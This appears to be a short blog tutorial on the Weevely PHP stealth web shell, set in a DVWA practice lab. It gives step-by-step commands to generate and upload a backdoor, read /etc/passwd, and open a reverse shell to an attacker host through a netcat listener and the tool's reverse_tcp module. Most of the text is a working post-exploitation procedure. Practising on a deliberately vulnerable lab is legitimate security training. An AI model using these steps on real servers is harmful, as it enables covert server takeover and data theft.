Weevely PHP stealth web shell and backdoor is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks. It is an essential tool for web application post exploitation, and also can be used as stealth backdoor
Weevely is by defaultly available in OS like Backtrack, Backbox etc.
Weevely php stealth web shell and backdoor has more than 30 modules available for post exploitation tasks.
weevely is written in python.
Lets Start our Practical
Requirement:
1.Webserver for uploading the backdoor ( i installed dvwa on linux box)
2.Weevely PHP Shell(i.e, available in backtrack 5R3)
Steps to start
1.weevely is available in /pentest/backdoors/web/weevely/
Open terminal and type cd /pentest/backdoors/web/weevely/
2.Generate PHP stealth backdoor
./weevely.py generate security
When we execute this command a new file will be created called weevely.php
3.After generatig file the next step will be upload weevely.php file to webserver and we are uploading it to webserver.
I am using DVWA(Damn Vulnerable Web Application) for testing purpose
4.Now file has been successfully uploaded
5.Now access that weevely .php from terminal
./weevely.py
./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security
Now we are in server
6.If we want to see files in that directory type ls
7.if we want to see passwords cat /etc/passwd
8.if we want to see who we are
whoami
9.using weevely for backdoor
here i am opening one more terminal and i am starting netcat
nc -lvp 1234
and in weevely terminal
:backdoor.reverse_tcp 192.168.142.132 1234
now we are connected
now you can access all server files.
thank you.
0 comments:
Post a Comment